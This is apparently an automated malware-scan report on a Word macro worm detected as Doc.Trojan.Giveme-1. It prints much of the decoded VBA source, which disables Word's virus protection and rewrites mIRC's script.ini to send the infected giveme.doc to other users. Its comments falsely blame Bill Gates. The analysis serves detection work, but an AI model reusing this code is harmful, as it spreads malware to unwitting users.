MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample exhibits characteristics of a legacy macro-virus, specifically using WordBasic and containing markers like 'ToolsMacro' and 'AutoOpen'. The embedded VBA script attempts to interact with the mIRC client, checking for its presence and potentially installing a worm by manipulating mIRC's script.ini file and dropping files like 'giveme.doc'. The script's obfuscation and truncation limit a full understanding of its capabilities, but its intent appears to be related to worm propagation.
Heuristics 4
-
ClamAV: Doc.Trojan.Giveme-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Giveme-1
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30199 bytes |
SHA-256: b2ddb3b7c1ab81903a32347f6308623a45c59617de11b97493729f127dc42d31 |
|||
|
Detection
ClamAV:
Doc.Trojan.Giveme-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Microsoft"
'Macro virus made by Microsoft Company.
'Author: Bill Gates (yeah, it's really me!).
'
'Bill Gates have to confess:
'"I was the one who did the Melissa virus! I'm sorry for the trouble I may have caused you."
'"The guy David Smith is innocent!"
Sub SetMeUp()
Dim Path As String, D1 As String, D2 As String, D3 As String, _
D4 As String, D5 As String, D6 As String, Docu As String, _
Hell As String
'Stealth
Call HideMe
On Error GoTo Aha
Close #1
'Check if mIRC worm is installed
Open "c:\go.sex" For Input As #1
Input #1, Path
Close #1
If Path = "No fucking mIRC!" Then GoTo WhatTheHell
Open Path & "giveme.doc" For Input As #1
Close #1
Open Path & "script.ini" For Input As #1
Input #1, D1, D2, D3, D4, D5, D6
Close #1
If D1 <> "[script]" Or D2 <> "n0=on 1:JOIN:#:{" Or D3 <> "n1=/msg $nick Hi $nick! Please read the file I'm sending to you. You will get warez" Or D4 <> "mp3 and XXX passwords FOR FREE!" Or D5 <> "n2=/send $nick " & Path & "giveme.doc" Or D6 <> "n3=}" Then GoTo Aha
'MsgBox "mIRC worm already installed.", vbInformation
Exit Sub
Aha:
Resume GoGo
GoGo:
On Error GoTo WhatTheHell
Close #1
StatusBar = "Loading..."
If LCase(Dir("c:\mirc\mirc32.exe")) = "mirc32.exe" Then
Path = "c:\mirc\"
Else
With Application.FileSearch
.NewSearch
.LookIn = "c:\"
.SearchSubFolders = True
.FileName = "mirc32.exe"
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
Hell = 0
'No fucking mIRC!
If .FoundFiles.Count = 0 Then Hell = 1
If Dir(.FoundFiles(1)) = "" Then Hell = 1
If LCase(Right(.FoundFiles(1), 10)) <> "mirc32.exe" Then Hell = 1
If Left(Right(.FoundFiles(1), 11), 1) <> "\" Then Hell = 1
If Hell = 1 Then
'Stupid idiot! Doesn't everyone have mIRC?
Path = "No fucking mIRC!"
GoTo SavePath
Else
'mIRC path
Path = Left(.FoundFiles(1), Len(.FoundFiles(1)) - 10)
End If
End With
End If
Docu = ActiveDocument.FullName
'No fucking write-protect!
If LCase(Dir(Path & "giveme.doc")) = "giveme.doc" Then _
SetAttr Path & "giveme.doc", vbNormal
'Copy infected file to mIRC directory
ActiveDocument.SaveAs Path & "giveme.doc", wdFormatTemplate
'No fucking write-protect!
SetAttr Docu, vbNormal
'Save the document
ActiveDocument.SaveAs Docu, wdFormatTemplate
'Write-protected files sucks so hard!
If LCase(Dir(Path & "script.ini")) = "script.ini" Then _
SetAttr Path & "script.ini", vbNormal
'Create mIRC worm
Open Path & "script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1=/msg $nick Hi $nick! Please read the file I'm sending to you. You will get warez, mp3 and XXX passwords FOR FREE!"
Print #1, "n2=/send $nick " & Path & "giveme.doc"
Print #1, "n3=}"
Close #1
SavePath:
'Yep, I still hate those fucking write-protected files!
If LCase(Dir("c:\go.sex")) = "go.sex" Then _
SetAttr "c:\go.sex", vbNormal
'Save the mIRC path
Open "c:\go.sex" For Output As #1
Print #1, Path
Close #1
Exit Sub
WhatTheHell:
'MsgBox "No mIRC found.", vbInformation
Close #1
Exit Sub
End Sub
Sub HideMe()
On Error Resume Next
'Stealth
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
WordBasic.DisableAutoMacros = 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.SavePropertiesPrompt = False
Options.ConfirmConversions = False
SetAttr NormalTemplate.FullName, vbNormal
End Sub
Sub AutoExec()
'Stealth
Call HideMe
End Sub
Sub AutoOpen()
'Stealth
Call HideMe
'No bugs in Bill's code! No, no...
On Error Resume Next
'Even
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.